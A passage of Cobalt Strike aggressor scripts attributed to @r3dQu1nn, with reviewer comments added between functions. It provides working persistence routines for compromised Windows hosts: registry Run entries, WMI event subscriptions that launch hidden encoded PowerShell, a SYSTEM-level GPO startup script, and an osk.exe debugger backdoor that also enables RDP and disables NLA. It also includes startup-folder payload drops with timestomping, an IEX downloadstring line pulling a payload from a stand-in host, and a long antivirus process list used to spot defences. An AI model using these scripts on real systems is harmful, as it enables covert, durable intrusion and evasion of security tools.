267 | if ("$3['reglocation']" ismatch 'Registry Location..' || "$3['keyname']" ismatch 'Key Name..' || "$3['datatype']" ismatch 'Data Type..(REG_SZ)' || "$3['keyvalue']" ismatch 'Key Value..(Payload)') {
268 | berror($bid, "\c4Please enter a valid Registry Location, Key Name, Key Type, and a valid Payload Location.");
269 | break;
270 | }
271 | else {
272 | bpowerpick($bid, 'reg add "'.$3['reglocation'].'" /v "'.$3['keyname'].'" /t "'.$3['datatype'].'" /d "'.$3['keyvalue'].'" /f');
273 | bpowerpick($bid, 'reg query "'.$3['reglocation'].'"');
274 | }
275 | }));
276 |
277 | dialog_description($dialog, "Registry Persistence - Creates a custom Registry Entry for persistence on selected beacon. **HKLM\\ could require elevated access.");
278 |
279 | drow_text($dialog, "reglocation", "Registry Location:");
280 | drow_text($dialog, "keyname", "Registry Key Name:");
281 | drow_text($dialog, "datatype", "Registry Key Type:");
282 | drow_text($dialog, "keyvalue", "Registry Key Value..(Payload Location):");
283 |
284 | dbutton_action($dialog, "Create");
285 | dialog_show($dialog);
286 |
287 | }
288 |
289 | #Permanent WMI Event using WMIC Persistence
290 | #Author: @r3dQu1nn
291 | #Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon
292 | #Very syntax heavy, Test first before using on live targets
293 |
#WMI permanent event subscription created through wmic.exe.
#  $1 - beacon id; captured as $bid by the dialog callback.
#The callback receives $3 = eventfilter / eventquery / eventconsumer / commandline / payloadfile.
#It creates three objects in the root\subscription namespace: an __EventFilter (WQL query
#$3['eventquery'], EventNameSpace root\cimv2), a CommandLineEventConsumer whose template is
#"<commandline> <last '/'-separated segment of payloadfile>", and a __FilterToConsumerBinding
#tying the two together. Each class's __RELPATH is then listed for verification.
#NOTE(review): the placeholder check compares 'commandline' against "...(powershell.exe -w hidden)"
#and 'payloadfile' against "Select Encoded Payload..", neither of which is the default text set
#in the dialog above, so those two fields pass validation even when left untouched.
#NOTE(review): split("/", ...)[-1] on payloadfile looks like a leftover from a file-path field;
#the row is now a plain text string.
294 | sub persistwmieventwmic {
295 | $bid = $1;
296 | $dialog = dialog("Permanent WMI Event using WMIC Persistence", %(eventfilter => "__EventFilter Name..", eventquery => "Event Query...(Win32 Classes)", eventconsumer => "CommandLineEventConsumer Name..(Must be different from __EventFilter Name)", commandline => "CommandLineTemplate Syntax..(powershell.exe -w hidden -enc)", payloadfile => "Encoded Payload String.."), lambda({
297 | if ("$3['eventfilter']" ismatch '__EventFilter Name..' || "$3['eventquery']" ismatch 'Event Query...(Win32 Classes)' || "$3['eventconsumer']" ismatch 'CommandLineEventConsumer Name..(Must be different from __EventFilter Name)' || "$3['commandline']" ismatch 'CommandLineTemplate Syntax..(powershell.exe -w hidden)' || "$3['payloadfile']" ismatch 'Select Encoded Payload..') {
298 | berror($bid, "\c4Please enter a valid Custom __EventFilter Name, Event Query, CommandLineEventConsumer Name, Command Line Options, and the Encoded Payload File.");
299 | break;
300 | }
301 | else {
302 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter CREATE Name="'.$3['eventfilter'].'", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="'.$3['eventquery'].'"');
303 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer CREATE Name="'.$3['eventconsumer'].'", CommandLineTemplate="'.$3['commandline']." ".split("/",$3['payloadfile'])[-1].'"');
304 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"'.$3['eventfilter'].'\"", Consumer="CommandLineEventConsumer.Name=\"'.$3['eventconsumer'].'\""');
305 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list');
306 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list');
307 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list');
308 | }
309 | }));
310 | dialog_description($dialog, "Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon. **Syntax is heavy, Test before using on live targets. Encoded Payload must include IEX ((new-object new.webclient).downloadstring(http://yourdomain/payload.txt)) Utilize the following command to encode the payload correctly: cat payload.txt | iconv --to-code=UTF-16LE | base64** ");
311 |
312 | #base 64 encode IEX of the powershell one liner
313 | #cat payload.txt | iconv --to-code=UTF-16LE | base64
314 |
315 | drow_text($dialog, "eventfilter", "Custom __EventFilter Name:");
316 | drow_text($dialog, "eventquery", "Custom Event Query:");
317 | drow_text($dialog, "eventconsumer", "Custom CommandLineEventConsumer Name:");
318 | drow_text($dialog, "commandline", "Custom Command Line Options:");
319 | drow_text($dialog, "payloadfile", "Custom Encoded Payload String:");
320 |
321 | dbutton_action($dialog, "Create");
322 | dialog_show($dialog);
323 |
324 | }
325 |
326 | #Permanent WMI Event using PowerShell Persistence
327 | #Author: @r3dQu1nn
328 | #Generates a Custom WMI Event using PowerShell for SYSTEM Level persistence on selected beacon
329 | #Very syntax heavy, Test first before using on live targets
330 | #Sample Queries:
331 | ## User Logon:
332 | #SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2
333 | ## System UpTime (Reboot):
334 | #SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320
335 | #https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
336 |
#WMI permanent event subscription created through PowerShell (Set-WmiInstance).
#  $1 - beacon id; captured as $bid by the dialog callback.
#$ExePath is chosen from the beacon's architecture (-is64): 64-bit beacons get the System32
#powershell.exe, everything else "C:\Windows\powershell.exe".
#NOTE(review): that second path is not a usual PowerShell install location -- confirm it is intended.
#The callback receives $3 = eventfilter / eventquery / payloadstring and, in one bpowerpick! call,
#creates in root\subscription an __EventFilter (query $3['eventquery'] against root\CimV2), a
#CommandLineEventConsumer whose CommandLineTemplate is "$ExePath <payloadstring>", and a
#__FilterToConsumerBinding joining them. The filter and consumer are then queried back by name.
#NOTE(review): the consumer is also created with Name=$3['eventfilter'], so filter and consumer
#share a single name; the blog line says root\CimV2 although the objects live in root\subscription.
337 | sub persistwmievent {
338 | $bid = $1;
339 | if (-is64 $bid) {
340 | $ExePath = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc";
341 | }
342 | else {
343 | $ExePath = "C:\\Windows\\powershell.exe -nop -w hidden -enc";
344 | }
345 |
346 | $dialog = dialog("Permanent WMI Event Persistence with PowerShell", %(eventfilter => "__EventFilter Name..", eventquery => "Event Query...(Win32 Classes)", payloadstring => "Encoded Payload String.."), lambda({
347 | if ("$3['eventfilter']" ismatch '__EventFilter Name..' || "$3['eventquery']" ismatch 'Event Query...(Win32 Classes)' || "$3['payloadstring']" ismatch 'Encoded Payload String..') {
348 | berror($bid, "\c4Please enter a valid __EventFilter Name, Event Query, and an Encoded Payload String.");
349 | break;
350 | }
351 | else {
352 | $powershellcmd = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name=\"".$3['eventfilter']."\";EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"".$3['eventquery']."\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name=\"".$3['eventfilter']."\";CommandLineTemplate =\"". $ExePath ." ".$3['payloadstring']."\"};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};";
353 | bpowerpick!($bid, $powershellcmd);
354 | blog($bid, 'Permanently Storing '.$3['eventfilter'].' in root\CimV2..');
355 | bpowerpick($bid, 'Get-WmiObject __eventFilter -namespace root\subscription -filter "name=\''.$3['eventfilter'].'\'"');
356 | bpowerpick($bid, 'Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name=\''.$3['eventfilter'].'\'"');
357 | }
358 | }));
359 | dialog_description($dialog, "Generates a Custom WMI Event using PowerShell for SYSTEM Level persistence on selected beacon. **Syntax is heavy, Test before using on live targets. Encoded Payload String must be converted to UTF-16LE, base64 encoded and under 1MB.**");
360 |
361 | drow_text($dialog, "eventfilter", "Custom __EventFilter Name:");
362 | drow_text($dialog, "eventquery", "Custom Event Query:");
363 | drow_text($dialog, "payloadstring", "Custom Encoded Payload String:");
364 |
365 | dbutton_action($dialog, "Create");
366 | dialog_show($dialog);
367 | }
368 |
369 | #Startup Script Local GPO Persistence
370 | #Author: @r3dQu1nn
371 | #Generates a Local GPO Entry in psscripts.ini to call a .ps1 script file for persistence on selected beacon
372 | #Calls back as SYSTEM
373 | #**Check permissions with GPO Enumeration (Successful GroupPolicy Directory Listing) first before executing**
374 | #**Beacon execution will cause winlogon.exe to hang and the end user can't login. Once the new beacon checks in inject into another process and kill the original. Update to come out soon.**
375 | #https://cybersyndicates.com/2016/01/system-context-persistence-in-gpo-startup/
376 |
#Local GPO startup-script persistence.
#  $1 - beacon id; captured as $bid by the dialog callback.
#The callback receives $3['scriptfile'], the local .ps1 chosen with drow_file, and then:
#  1. bcd's the beacon to C:\ and uploads the script there;
#  2. writes a psscripts.ini on the OPERATOR side with openf() (relative to the client's working
#     directory) whose [Startup] entry 0 names the script's basename (last '/' segment);
#  3. moves the uploaded script into C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup\;
#  4. uploads psscripts.ini via script_resource(), which resolves relative to this .cna's
#     directory -- NOTE(review): not necessarily the directory openf() wrote to in step 2; confirm;
#  5. deletes the existing Machine\Scripts\psscripts.ini (any prior startup entries are lost),
#     moves the new one into place and runs gpupdate /force.
#NOTE(review): the error text mentions a "Script Path", but the dialog has a single field.
377 | sub persistStartupGPO {
378 |
379 | $bid = $1;
380 | $dialog = dialog("Startup Script Local GPO Persistence", %(scriptfile => "Select PS1 Script File.."), lambda({
381 | if ("$3['scriptfile']" ismatch 'Select PS1 Script File..') {
382 | berror($bid, "\c4Please enter a valid Script Path, and .ps1 Script File.");
383 | break;
384 | }
385 | else {
386 | bcd($bid, "C:\\");
387 | bupload($bid, $3['scriptfile']);
388 | $handle = openf(">psscripts.ini");
389 | writeb($handle, "[ScriptsConfig]\nStartExecutePSFirst=true\n[Startup]\n0CmdLine=".split("/",$3['scriptfile'])[-1]."\n0Parameters=");
390 | closef($handle);
391 | bpowerpick($bid, 'Move-Item -force -path C:\\'.split("/",$3['scriptfile'])[-1].' -destination C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\Startup\\');
392 | bupload($bid, script_resource("psscripts.ini"));
393 | bpowerpick($bid, 'Remove-Item -Force C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\psscripts.ini');
394 | bpowerpick($bid, 'Move-Item -force -path C:\\psscripts.ini -destination C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\');
395 | bpowerpick($bid, 'gpupdate /force');
396 | }
397 | }));
398 |
399 | dialog_description($dialog, "Startup Script Local GPO Persistence - Generates a Local GPO Entry in psscripts.ini to call a .ps1 script file for persistence on selected beacon. **Check permissions with GPO Enumeration (Successful GroupPolicy Directory Listing) first before executing**");
400 |
401 | drow_file($dialog, "scriptfile", ".ps1 Script File:");
402 |
403 | dbutton_action($dialog, "Create");
404 | dialog_show($dialog);
405 |
406 | }
407 |
#"Sticky keys"-style RDP backdoor. $1 is the beacon id; there is no dialog and no input validation.
#The six bpowerpick commands make these durable host changes (all registry, firewall or service state,
#each of which is straightforward to audit):
#  1. Terminal Server\fDenyTSConnections = 0 -- allows RDP connections
#  2. IFEO Debugger for osk.exe (the on-screen keyboard) set to cmd.exe -- note the target is
#     osk.exe, not sethc.exe, despite the sub's name; this is also the only reg add without /f,
#     so an already-present value may make reg prompt instead of overwriting (confirm)
#  3. RDP-Tcp\UserAuthentication = 0 -- turns off Network Level Authentication
#  4./5. legacy 'netsh firewall' and 'netsh advfirewall' rules enabling the Remote Desktop group
#  6. starts TermService
408 | sub stickykeys {
409 |
410 | bpowerpick($1, 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f');
411 | bpowerpick($1, 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"');
412 | bpowerpick($1, 'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d "0" /f');
413 | bpowerpick($1, 'netsh firewall set service type = remotedesktop mode = enable');
414 | bpowerpick($1, 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes');
415 | bpowerpick($1, 'net start TermService');
416 |
417 | }
418 |
#Startup-folder persistence: uploads a chosen file into an operator-supplied Startup directory.
#  $1 - beacon id; captured as $bid by the dialog callback.
#The callback receives $3['startup'] (target folder, free text) and $3['payload'] (local file picked
#with drow_file); placeholder text in either field aborts with an error.
#NOTE(review): the 'cd' is issued inside a powerpick process, whereas persistStartupGPO uses bcd()
#to move the beacon itself -- whether bupload here lands in $3['startup'] or in the beacon's current
#directory should be confirmed.
#NOTE(review): btimestomp is handed the local dialog path "$3['payload']" as the file whose timestamps
#are copied from calc.exe; the remote name is presumably just its basename -- verify.
419 | sub persistThroughStartUpFolder {
420 | $bid = $1;
421 | $dialog = dialog("Start Up Folder Persistence", %(startup => "Startup Directory Folder..", payload => "Select Payload.."), lambda({
422 | if ("$3['startup']" ismatch 'Startup Directory Folder..' || "$3['payload']" ismatch 'Select Payload..') {
423 | berror($bid, "\c4Please enter a valid Startup Directory Folder, and select a Payload.");
424 | break;
425 | }
426 | else {
427 | bpowerpick($bid, 'cd "'.$3['startup'].'"');
428 | bupload($bid, $3['payload']);
429 | btimestomp($bid, "$3['payload']", "c:\\windows\\system32\\calc.exe");
430 | }
431 | }));
432 | dialog_description($dialog, "Start Up Folder Persistence - Generates a Startup Folder Entry and places a payload inside that folder. **Windows NT 6.0-10.0/All Users Location - %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup | Windows NT 6.0-10.0/Current User Location %SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup");
433 |
434 | drow_text($dialog, "startup", "StartUp Directory Folder Location:");
435 | drow_file($dialog, "payload", "Select Payload:");
436 |
437 | dbutton_action($dialog, "Create");
438 | dialog_show($dialog);
439 | }
440 |
--------------------------------------------------------------------------------
/ProcessColor.cna:
--------------------------------------------------------------------------------
1 | #Color Coded Process Listing
2 | #Author: @r3dQu1nn
3 | #Takes the PS output in CS and color codes all AV processes, the explorer process, browser processes, and the current process
4 | #Thanks to @oldb00t for creating the original beacon-ps-highlight.cna script! Script here: https://github.com/oldb00t/AggressorScripts/tree/master/Ps-highlight
5 | #This script removes the need for the av_hips_executables.txt requirement
6 |
7 | set BEACON_OUTPUT_PS {
8 |
9 | $bd = bdata($1);
10 | @av = @("Tanium.exe", "360RP.exe", "360SD.exe", "360Safe.exe", "360leakfixer.exe", "360rp.exe", "360safe.exe", "360sd.exe", "360tray.exe", "AAWTray.exe", "ACAAS.exe", "ACAEGMgr.exe", "ACAIS.exe", "AClntUsr.EXE", "ALERT.EXE", "ALERTSVC.EXE", "ALMon.exe", "ALUNotify.exe", "ALUpdate.exe", "ALsvc.exe", "AVENGINE.exe", "AVGCHSVX.EXE", "AVGCSRVX.EXE", "AVGIDSAgent.exe", "AVGIDSMonitor.exe", "AVGIDSUI.exe", "AVGIDSWatcher.exe", "AVGNSX.EXE", "AVKProxy.exe", "AVKService.exe", "AVKTray.exe", "AVKWCtl.exe", "AVP.EXE", "AVP.exe", "AVPDTAgt.exe", "AcctMgr.exe", "Ad-Aware.exe", "Ad-Aware2007.exe", "AddressExport.exe", "AdminServer.exe", "Administrator.exe", "AeXAgentUIHost.exe", "AeXNSAgent.exe", "AeXNSRcvSvc.exe", "AlertSvc.exe", "AlogServ.exe", "AluSchedulerSvc.exe", "AnVir.exe", "AppSvc32.exe", "AtrsHost.exe", "Auth8021x.exe", "AvastSvc.exe", "AvastUI.exe", "Avconsol.exe", "AvpM.exe", "Avsynmgr.exe", "Avtask.exe", "BLACKD.exe", "BWMeterConSvc.exe", "CAAntiSpyware.exe", "CALogDump.exe", "CAPPActiveProtection.exe", "CAPPActiveProtection.exe", "CB.exe", "CCAP.EXE", "CCenter.exe", "CClaw.exe", "CLPS.exe", "CLPSLA.exe", "CLPSLS.exe", "CNTAoSMgr.exe", "CPntSrv.exe", "CTDataLoad.exe", "CertificationManagerServiceNT.exe", "ClShield.exe", "ClamTray.exe", "ClamWin.exe", "Console.exe", "CylanceUI.exe", "DAO_Log.exe", "DLService.exe", "DLTray.EXE", "DLTray.exe", "DRWAGNTD.EXE", "DRWAGNUI.EXE", "DRWEB32W.EXE", "DRWEBSCD.EXE", "DRWEBUPW.EXE", "DRWINST.EXE", "DSMain.exe", "DWHWizrd.exe", "DefWatch.exe", "DolphinCharge.exe", "EHttpSrv.exe", "EMET_Agent.exe", "EMET_Service.exe", "EMLPROUI.exe", "EMLPROXY.exe", "EMLibUpdateAgentNT.exe", "ETConsole3.exe", "ETCorrel.exe", "ETLogAnalyzer.exe", "ETReporter.exe", "ETRssFeeds.exe", "EUQMonitor.exe", "EndPointSecurity.exe", "EngineServer.exe", "EntityMain.exe", "EtScheduler.exe", "EtwControlPanel.exe", "EventParser.exe", "FAMEH32.exe", "FCDBLog.exe", "FCH32.exe", "FPAVServer.exe", "FProtTray.exe", "FSCUIF.exe", "FSHDLL32.exe", "FSM32.exe", 
"FSMA32.exe", "FSMB32.exe", "FWCfg.exe", "FireSvc.exe", "FireTray.exe", "FirewallGUI.exe", "ForceField.exe", "FortiProxy.exe", "FortiTray.exe", "FortiWF.exe", "FrameworkService.exe", "FreeProxy.exe", "GDFirewallTray.exe", "GDFwSvc.exe", "HWAPI.exe", "ISNTSysMonitor.exe", "ISSVC.exe", "ISWMGR.exe", "ITMRTSVC.exe", "ITMRT_SupportDiagnostics.exe", "ITMRT_TRACE.exe", "IcePack.exe", "IdsInst.exe", "InoNmSrv.exe", "InoRT.exe", "InoRpc.exe", "InoTask.exe", "InoWeb.exe", "IsntSmtp.exe", "KABackReport.exe", "KANMCMain.exe", "KAVFS.EXE", "KAVStart.exe", "KLNAGENT.EXE", "KMailMon.exe", "KNUpdateMain.exe", "KPFWSvc.exe", "KSWebShield.exe", "KVMonXP.exe", "KVMonXP_2.exe", "KVSrvXP.exe", "KWSProd.exe", "KWatch.exe", "KavAdapterExe.exe", "KeyPass.exe", "KvXP.exe", "LUALL.EXE", "LWDMServer.exe", "LockApp.exe", "LockAppHost.exe", "LogGetor.exe", "MCSHIELD.EXE", "MCUI32.exe", "MSASCui.exe", "ManagementAgentNT.exe", "McAfeeDataBackup.exe", "McEPOC.exe", "McEPOCfg.exe", "McNASvc.exe", "McProxy.exe", "McScript_InUse.exe", "McWCE.exe", "McWCECfg.exe", "Mcshield.exe", "Mctray.exe", "MgntSvc.exe", "MpCmdRun.exe", "MpfAgent.exe", "MpfSrv.exe", "MsMpEng.exe", "NAIlgpip.exe", "NAVAPSVC.EXE", "NAVAPW32.EXE", "NCDaemon.exe", "NIP.exe", "NJeeves.exe", "NLClient.exe", "NMAGENT.EXE", "NOD32view.exe", "NPFMSG.exe", "NPROTECT.EXE", "NRMENCTB.exe", "NSMdtr.exe", "NTRtScan.exe", "NVCOAS.exe", "NVCSched.exe", "NavShcom.exe", "Navapsvc.exe", "NaveCtrl.exe", "NaveLog.exe", "NaveSP.exe", "Navw32.exe", "Navwnt.exe", "Nip.exe", "Njeeves.exe", "Npfmsg2.exe", "Npfsvice.exe", "NscTop.exe", "Nvcoas.exe", "Nvcsched.exe", "Nymse.exe", "OLFSNT40.EXE", "OMSLogManager.exe", "ONLINENT.exe", "ONLNSVC.exe", "OfcPfwSvc.exe", "PASystemTray.exe", "PAVFNSVR.exe", "PAVSRV51.exe", "PNmSrv.exe", "POPROXY.EXE", "POProxy.exe", "PPClean.exe", "PPCtlPriv.exe", "PQIBrowser.exe", "PSHost.exe", "PSIMSVC.EXE", "PXEMTFTP.exe", "PadFSvr.exe", "Pagent.exe", "Pagentwd.exe", "PavBckPT.exe", "PavFnSvr.exe", "PavPrSrv.exe", "PavProt.exe", 
"PavReport.exe", "Pavkre.exe", "PcCtlCom.exe", "PcScnSrv.exe", "PccNTMon.exe", "PccNTUpd.exe", "PpPpWallRun.exe", "PrintDevice.exe", "ProUtil.exe", "PsCtrlS.exe", "PsImSvc.exe", "PwdFiltHelp.exe", "Qoeloader.exe", "RAVMOND.exe", "RAVXP.exe", "RNReport.exe", "RPCServ.exe", "RSSensor.exe", "RTVscan.exe", "RapApp.exe", "Rav.exe", "RavAlert.exe", "RavMon.exe", "RavMonD.exe", "RavService.exe", "RavStub.exe", "RavTask.exe", "RavTray.exe", "RavUpdate.exe", "RavXP.exe", "RealMon.exe", "Realmon.exe", "RedirSvc.exe", "RegMech.exe", "ReporterSvc.exe", "RouterNT.exe", "Rtvscan.exe", "SAFeService.exe", "SAService.exe", "SAVAdminService.exe", "SAVFMSESp.exe", "SAVMain.exe", "SAVScan.exe", "SCANMSG.exe", "SCANWSCS.exe", "SCFManager.exe", "SCFService.exe", "SCFTray.exe", "SDTrayApp.exe", "SEVINST.EXE", "SMEX_ActiveUpdate.exe", "SMEX_Master.exe", "SMEX_RemoteConf.exe", "SMEX_SystemWatch.exe", "SMSECtrl.exe", "SMSELog.exe", "SMSESJM.exe", "SMSESp.exe", "SMSESrv.exe", "SMSETask.exe", "SMSEUI.exe", "SNAC.EXE", "SNAC.exe", "SNDMon.exe", "SNDSrvc.exe", "SPBBCSvc.exe", "SPIDERML.EXE", "SPIDERNT.EXE", "SSM.exe", "SSScheduler.exe", "SVCharge.exe", "SVDealer.exe", "SVFrame.exe", "SVTray.exe", "SWNETSUP.EXE", "SavRoam.exe", "SavService.exe", "SavUI.exe", "ScanMailOutLook.exe", "SeAnalyzerTool.exe", "SemSvc.exe", "SescLU.exe", "SetupGUIMngr.exe", "SiteAdv.exe", "Smc.exe", "SmcGui.exe", "SnHwSrv.exe", "SnICheckAdm.exe", "SnIcon.exe", "SnSrv.exe", "SnicheckSrv.exe", "SpIDerAgent.exe", "SpntSvc.exe", "SpyEmergency.exe", "SpyEmergencySrv.exe", "StOPP.exe", "StWatchDog.exe", "SymCorpUI.exe", "SymSPort.exe", "TBMon.exe", "TFGui.exe", "TFService.exe", "TFTray.exe", "TFun.exe", "TIASPN~1.EXE", "TSAnSrf.exe", "TSAtiSy.exe", "TScutyNT.exe", "TSmpNT.exe", "TmListen.exe", "TmPfw.exe", "Tmntsrv.exe", "Traflnsp.exe", "TrapTrackerMgr.exe", "UPSCHD.exe", "UcService.exe", "UdaterUI.exe", "UmxAgent.exe", "UmxCfg.exe", "UmxFwHlp.exe", "UmxPol.exe", "Up2date.exe", "UpdaterUI.exe", "UrlLstCk.exe", 
"UserActivity.exe", "UserAnalysis.exe", "UsrPrmpt.exe", "V3Medic.exe", "V3Svc.exe", "VPC32.exe", "VPDN_LU.exe", "VPTray.exe", "VSStat.exe", "VsStat.exe", "VsTskMgr.exe", "WEBPROXY.EXE", "WFXCTL32.EXE", "WFXMOD32.EXE", "WFXSNT40.EXE", "WebProxy.exe", "WebScanX.exe", "WinRoute.exe", "WrSpySetup.exe", "ZLH.exe", "Zanda.exe", "ZhuDongFangYu.exe", "Zlh.exe", "_avp32.exe", "_avpcc.exe", "_avpm.exe", "aAvgApi.exe", "aawservice.exe", "acaif.exe", "acctmgr.exe", "ackwin32.exe", "aclient.exe", "adaware.exe", "advxdwin.exe", "aexnsagent.exe", "aexsvc.exe", "aexswdusr.exe", "aflogvw.exe", "afwServ.exe", "agentsvr.exe", "agentw.exe", "ahnrpt.exe", "ahnsd.exe", "ahnsdsv.exe", "alertsvc.exe", "alevir.exe", "alogserv.exe", "alsvc.exe", "alunotify.exe", "aluschedulersvc.exe", "amon9x.exe", "amswmagt.exe", "anti-trojan.exe", "antiarp.exe", "antivirus.exe", "ants.exe", "aphost.exe", "apimonitor.exe", "aplica32.exe", "aps.exe", "apvxdwin.exe", "arr.exe", "ashAvast.exe", "ashBug.exe", "ashChest.exe", "ashCmd.exe", "ashDisp.exe", "ashEnhcd.exe", "ashLogV.exe", "ashMaiSv.exe", "ashPopWz.exe", "ashQuick.exe", "ashServ.exe", "ashSimp2.exe", "ashSimpl.exe", "ashSkPcc.exe", "ashSkPck.exe", "ashUpd.exe", "ashWebSv.exe", "ashdisp.exe", "ashmaisv.exe", "ashserv.exe", "ashwebsv.exe", "asupport.exe", "aswDisp.exe", "aswRegSvr.exe", "aswServ.exe", "aswUpdSv.exe", "aswUpdsv.exe", "aswWebSv.exe", "aswupdsv.exe", "atcon.exe", "atguard.exe", "atro55en.exe", "atupdater.exe", "atwatch.exe", "atwsctsk.exe", "au.exe", "aupdate.exe", "aupdrun.exe", "aus.exe", "auto-protect.nav80try.exe", "autodown.exe", "autotrace.exe", "autoup.exe", "autoupdate.exe", "avEngine.exe", "avadmin.exe", "avcenter.exe", "avconfig.exe", "avconsol.exe", "ave32.exe", "avengine.exe", "avesvc.exe", "avfwsvc.exe", "avgam.exe", "avgamsvr.exe", "avgas.exe", "avgcc.exe", "avgcc32.exe", "avgcsrvx.exe", "avgctrl.exe", "avgdiag.exe", "avgemc.exe", "avgfws8.exe", "avgfws9.exe", "avgfwsrv.exe", "avginet.exe", "avgmsvr.exe", "avgnsx.exe", 
"avgnt.exe", "avgregcl.exe", "avgrssvc.exe", "avgrsx.exe", "avgscanx.exe", "avgserv.exe", "avgserv9.exe", "avgsystx.exe", "avgtray.exe", "avguard.exe", "avgui.exe", "avgupd.exe", "avgupdln.exe", "avgupsvc.exe", "avgvv.exe", "avgw.exe", "avgwb.exe", "avgwdsvc.exe", "avgwizfw.exe", "avkpop.exe", "avkserv.exe", "avkservice.exe", "avkwctl9.exe", "avltmain.exe", "avmailc.exe", "avmcdlg.exe", "avnotify.exe", "avnt.exe", "avp.exe", "avp32.exe", "avpcc.exe", "avpdos32.exe", "avpexec.exe", "avpm.exe", "avpncc.exe", "avps.exe", "avptc32.exe", "avpupd.exe", "avscan.exe", "avsched32.exe", "avserver.exe", "avshadow.exe", "avsynmgr.exe", "avwebgrd.exe", "avwin.exe", "avwin95.exe", "avwinnt.exe", "avwupd.exe", "avwupd32.exe", "avwupsrv.exe", "avxmonitor9x.exe", "avxmonitornt.exe", "avxquar.exe", "backweb.exe", "bargains.exe", "basfipm.exe", "bd_professional.exe", "bdagent.exe", "bdc.exe", "bdlite.exe", "bdmcon.exe", "bdss.exe", "bdsubmit.exe", "beagle.exe", "belt.exe", "bidef.exe", "bidserver.exe", "bipcp.exe", "bipcpevalsetup.exe", "bisp.exe", "blackd.exe", "blackice.exe", "blink.exe", "blss.exe", "bmrt.exe", "bootconf.exe", "bootwarn.exe", "borg2.exe", "bpc.exe", "bpk.exe", "brasil.exe", "bs120.exe", "bundle.exe", "bvt.exe", "bwgo0000.exe", "ca.exe", "caav.exe", "caavcmdscan.exe", "caavguiscan.exe", "caf.exe", "cafw.exe", "caissdt.exe", "capfaem.exe", "capfasem.exe", "capfsem.exe", "capmuamagt.exe", "casc.exe", "casecuritycenter.exe", "caunst.exe", "cavrep.exe", "cavrid.exe", "cavscan.exe", "cavtray.exe", "ccApp.exe", "ccEvtMgr.exe", "ccLgView.exe", "ccProxy.exe", "ccSetMgr.exe", "ccSetmgr.exe", "ccSvcHst.exe", "ccap.exe", "ccapp.exe", "ccevtmgr.exe", "cclaw.exe", "ccnfagent.exe", "ccprovsp.exe", "ccproxy.exe", "ccpxysvc.exe", "ccschedulersvc.exe", "ccsetmgr.exe", "ccsmagtd.exe", "ccsvchst.exe", "ccsystemreport.exe", "cctray.exe", "ccupdate.exe", "cdp.exe", "cfd.exe", "cfftplugin.exe", "cfgwiz.exe", "cfiadmin.exe", "cfiaudit.exe", "cfinet.exe", "cfinet32.exe", "cfnotsrvd.exe", 
"cfp.exe", "cfpconfg.exe", "cfpconfig.exe", "cfplogvw.exe", "cfpsbmit.exe", "cfpupdat.exe", "cfsmsmd.exe", "checkup.exe", "cka.exe", "clamscan.exe", "claw95.exe", "claw95cf.exe", "clean.exe", "cleaner.exe", "cleaner3.exe", "cleanpc.exe", "cleanup.exe", "click.exe", "cmdagent.exe", "cmdinstall.exe", "cmesys.exe", "cmgrdian.exe", "cmon016.exe", "comHost.exe", "connectionmonitor.exe", "control_panel.exe", "cpd.exe", "cpdclnt.exe", "cpf.exe", "cpf9x206.exe", "cpfnt206.exe", "crashrep.exe", "csacontrol.exe", "csinject.exe", "csinsm32.exe", "csinsmnt.exe", "csrss_tc.exe", "ctrl.exe", "cv.exe", "cwnb181.exe", "cwntdwmo.exe", "cz.exe", "datemanager.exe", "dbserv.exe", "dbsrv9.exe", "dcomx.exe", "defalert.exe", "defscangui.exe", "defwatch.exe", "deloeminfs.exe", "deputy.exe", "diskmon.exe", "divx.exe", "djsnetcn.exe", "dllcache.exe", "dllreg.exe", "doors.exe", "doscan.exe", "dpf.exe", "dpfsetup.exe", "dpps2.exe", "drwagntd.exe", "drwatson.exe", "drweb.exe", "drweb32.exe", "drweb32w.exe", 